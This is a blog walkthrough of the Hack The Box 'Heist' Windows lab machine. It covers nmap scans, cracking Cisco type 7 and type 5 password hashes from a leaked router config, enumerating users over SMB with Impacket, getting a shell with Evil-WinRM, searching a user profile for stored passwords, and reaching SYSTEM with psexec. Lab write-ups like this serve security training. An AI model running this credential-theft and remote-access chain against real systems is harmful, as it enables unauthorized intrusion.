Hack The Box Heist Walkthrough – 10.10.10.149

Heist is a easy windows box in the Hack The Box CTF series.

As usual I added 10.10.10.149 to etc/hosts as heist.htb.

INITIAL ENUMERATION

I started with nmap port-scan using nmap -v -sV -sC -oN nmap.scan heist.htb command.

The NMAP result was as below:

➜  heist nmap -v -sV -sC -oN nmap.scan 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 13:15 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating Ping Scan at 13:15
Scanning 10.10.10.149 [4 ports]
Completed Ping Scan at 13:15, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:15
Completed Parallel DNS resolution of 1 host. at 13:15, 0.05s elapsed
Initiating SYN Stealth Scan at 13:15
Scanning 10.10.10.149 [1000 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Completed SYN Stealth Scan at 13:15, 24.33s elapsed (1000 total ports)
Initiating Service scan at 13:15
Scanning 3 services on 10.10.10.149
Completed Service scan at 13:16, 20.01s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.149.
Initiating NSE at 13:16
Completed NSE at 13:16, 40.08s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 1.06s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Nmap scan report for 10.10.10.149
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-11-10T10:16:11
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
           Raw packets sent: 2014 (88.592KB) | Rcvd: 17 (732B)
➜  heist 

NMAP revelead a couple of ports open, so the SMB (445) and IIS (80) are interesting here. Since the machine has SMB v2 installed, I’m not looking at it now, so I moved forward to look into webserver for enumeration.

Looking at the default webpage I found a website hosted on IIS, the webpage is a login page seems to be a login page to report issues. There is an option to login as guest which lists an open issue related to CISCO router with an attachment.

The attachment is just a txt file that contains running configuration of a cisco IOS with admin and a user -rout3r’s encrypted passwords.

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

It is very easy to decrypt CISCO 7 passwords these days, I used an online CISCO password decryptor to decrypt the encrypted password from the txt file in the attachment. But, we have a problem here, the type 5 password isn’t easy to decrypt, I had to use hashcat for this purpose. Hashcat decrypted the password in a few minutes and the password is stealth1agent

As I now have all the passwords obtained, let me see where I can use it. For the users, I tried “rout3r” and “admin”, but those didn’t work, then I realized there was a user called “hazard” in the “issues” page. Now I’m going to try the user “hazard” against the SMB login. However, I logged in successfully, but I wasn’t able to list the shares, which my user hazard has no privilege to access.

➜  heist smbclient -U hazard%stealth1agent -L 10.10.10.149

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

I need to find more users in the box, I understood that, I need to use impaket for this purpose. Impacket has a script called lookupsid.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) that lists the users of the Windows machine if you have basic authentication user.

The script successfully listed me a numbr support users:

➜  heist python lookupsid.py hazard:stealth1agent@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
➜  heist 

Since I wasn’t able to do any further enum, I decided to use EvilWinRM (a Windows Remote Manager exploit) to see if I can get a user shell. For this, I need to make sure the port 5985 is open and running. The port 5985 is by default used to Windows RM.

➜  evil-winrm git:(master) nmap -p 5985 heist.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:41 +03
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.15s latency).

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
➜  evil-winrm git:(master) 

Ok, the port is open, now lets try the users I have enumerated and the password I found after the decryption of the Cisco IOS configuration.

After trying couple of users, the user Chase was able to get the user shell on the box Heist.

➜  evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 

Getting User.txt

Here I got the user.txt

➜  evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        4/22/2019   9:08 AM            121 todo.txt                                                                                                                                                                                                
-a----        4/22/2019   9:07 AM             32 user.txt                                                                                                                                                                                                


*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
a127dae[---------]95f59c4
*Evil-WinRM* PS C:\Users\Chase\Desktop> 

PRIVILEGE ESCALATION

There are couple of ways to privesc in this box, I’m going with the intended one that is obtaining the password stored in the Firefox user profile.

So, first I will have to change the directory to the C:\Users\Chase\Appdata\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\sessionstore-backups

Using this PowerShell command:

Get-ChildItem -Path $Env:USERPROFILE -Recurse -File | Select-String password

After few initial fails, I have the password for admin:

The next step, I will use the password psexec script from Impacket and I get the Root.txt

➜  heist python psexec.py administrator@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nLvdvvMS.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service ZqjZ on heist.htb.....
[*] Starting service ZqjZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd / 

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of C:\Users\Administrator\Desktop

04/22/2019  09:05 AM    <DIR>          .
04/22/2019  09:05 AM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,839,940,608 bytes free

C:\Users\Administrator\Desktop>type root.txt
50dfa3[-----------------]3d766897
C:\Users\Administrator\Desktop>

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.